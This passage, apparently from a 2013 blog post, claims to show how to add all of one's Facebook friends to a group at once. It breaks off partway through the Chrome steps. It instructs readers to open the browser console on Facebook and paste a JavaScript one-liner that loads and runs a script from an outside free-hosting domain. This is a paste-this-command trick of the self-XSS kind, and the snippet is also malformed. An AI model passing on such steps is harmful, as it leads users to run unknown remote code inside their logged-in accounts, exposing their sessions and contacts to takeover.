Skip to main content

Posts

Showing posts from February, 2013

How to add all your friends in a Facebook group at once

Hi Friends, today we will learn how to add all your friends in any facebook group at Once. In simple terms by clicking on the Javascript , all your friends present in your friends list will be added to that particular group   . Its will take less time, i.e. you don't have to add one by one members.So lets begin. Mozilla Firefox Users : Step 1: Open your Facebook account . Step 2: Go to the Facebook group where you wanted to add the member. Step 3: Press Ctrl+Shift+K , a Console window will open. See the below image . Step 4: Now copy the Javascript code given below and paste it in the console and Press Enter : javascript:(function({document.body.appendChild(document.createElement('script')).src='http://www.nexusgroup.byethost4.com/nexus.js';})(); Step 5 : After Pressing Enter just wait for some seconds and that's it u r done! all your friends are now added to your group. For Chrome users : Step 1 & 2 same as abo